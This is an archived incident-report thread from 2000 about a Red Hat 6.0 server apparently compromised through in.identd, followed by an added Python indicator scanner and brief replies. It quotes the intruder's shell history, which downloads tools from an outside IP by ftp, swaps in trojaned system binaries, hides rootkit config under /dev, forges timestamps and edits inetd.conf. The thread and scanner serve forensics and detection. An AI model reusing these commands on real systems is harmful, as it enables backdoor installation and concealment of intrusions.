-----Original Message-----
From: Del Elson [del.AU]
Sent: Wednesday, April 19, 2000 1:02 AM
To: INCIDENTS
Subject: Rooted through in.identd on Red Hat 6.0

Hi,

A client was hacked last week by what looked like a buffer overflow through in.identd. This was on a Red Hat 6.0 box. RH don't have any current security notices or fixes for in.identd on their servers, and I haven't seen other boxes hacked through in.identd recently.

The hacker left the usual trace in /.bash_history, which ran like:

    mkdir /usr/lib/... ; cd /usr/lib/...
    ftp 200.192.58.201 21
    cd /usr/lib/...
    mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz; mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz; mv tcpd.gz? tcpd.gz
    gzip -d *
    chmod +x *
    mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin; mv pt07 /usr/lib/; mv pstree /usr/bin ; /usr/lib/pt07
    echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220 ; echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ; echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220 ; echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221;
    touch -t 199910122110 /dev/cui220
    touch -t 199910122110 /dev/cui221
    touch -t 199910122110 /usr/lib/pt07
    touch -t 199910122110 /usr/sbin/syslogd
    touch -t 199910122110 /usr/sbin/tcpd
    touch -t 199910122110 /bin/ps
    touch -t 199910122110 /bin/netstat
    touch -t 199910122110 /usr/bin/pstree
    cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
    mv /tmp/b /etc/inetd.conf
    killall -HUP inetd

... installing a back door and a partial cover of tracks.

The only messages in /var/log/messages around the time were:

    Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201
    Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
    Apr 8 23:16:05 home identd[12007]: Connection from 200.192.58.201
    Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21

... the IP address traces back to somewhere in Brazil.
Anyone know of any current bug notices, exploits, or patches for in.identd? Del
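A check for the traces listed in the report above, added here as an example and not part of the original thread: it looks for the hidden /usr/lib/... staging directory, regular files at /dev/cui220 and /dev/cui221, and the replaced binaries whose mtime was reset with touch -t 199910122110. Because touch cannot rewrite ctime, the ctime-versus-mtime comparison also catches the same trick done with a different date; the scan() root argument, build_sample_tree() and the 30-day threshold are assumptions of this example.

```python
import os
import tempfile
import time

# Indicators copied from the .bash_history quoted in the report above.
HIDDEN_DIR = "usr/lib/..."                       # staging directory literally named "..."
DEV_CONFIG_FILES = ("dev/cui220", "dev/cui221")  # config files hidden under /dev
REPLACED_BINARIES = ("bin/ps", "bin/netstat", "usr/bin/pstree",
                     "usr/sbin/syslogd", "usr/sbin/tcpd", "usr/lib/pt07")
# touch -t 199910122110 sets the mtime to 1999-10-12 21:10:00 local time.
FORGED_MTIME = time.mktime((1999, 10, 12, 21, 10, 0, 0, 0, -1))

def scan(root="/"):
    """Return (path, reason) pairs for every trace of the report's rootkit found under root."""
    findings = []
    hidden = os.path.join(root, HIDDEN_DIR)
    if os.path.isdir(hidden):
        findings.append((hidden, "hidden '...' directory"))
    for rel in DEV_CONFIG_FILES:
        p = os.path.join(root, rel)
        if os.path.isfile(p):  # a regular file, not a device node, under /dev
            findings.append((p, "regular file under /dev"))
    for rel in REPLACED_BINARIES:
        p = os.path.join(root, rel)
        if not os.path.exists(p):
            continue
        st = os.stat(p)
        if int(st.st_mtime) == int(FORGED_MTIME):
            findings.append((p, "mtime forged with touch -t 199910122110"))
        # touch cannot rewrite ctime: a ctime much newer than mtime shows the
        # file was replaced or re-stamped long after its claimed modification.
        if st.st_ctime - st.st_mtime > 30 * 24 * 3600:  # assumed threshold
            findings.append((p, "ctime newer than mtime by more than 30 days"))
    return findings

def build_sample_tree():
    """Constructed sample: a throwaway tree containing the report's traces (not real data)."""
    root = tempfile.mkdtemp(prefix="identd-ir-")
    for d in (HIDDEN_DIR, "dev", "bin", "usr/bin", "usr/sbin"):
        os.makedirs(os.path.join(root, d), exist_ok=True)
    for rel in DEV_CONFIG_FILES + ("bin/ps", "usr/sbin/syslogd"):
        with open(os.path.join(root, rel), "w") as f:
            f.write("constructed placeholder\n")
    for rel in ("bin/ps", "usr/sbin/syslogd"):  # mimic the touch -t from the history
        os.utime(os.path.join(root, rel), (FORGED_MTIME, FORGED_MTIME))
    return root

if __name__ == "__main__":
    print(*scan("/"), sep="\n")
```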
Why do you think the exploit is in.identd? Because of the messages? /usr/sbin/inetd is a much likelier target, but I don't know of any current exploits there.
I fear some by-default inetd-enabled services, e.g. in.telnetd, still have a hole in them. Please see my report #10860.
Still no sign of bugs in identd (which at least now runs as nobody or ident anyway)... closing.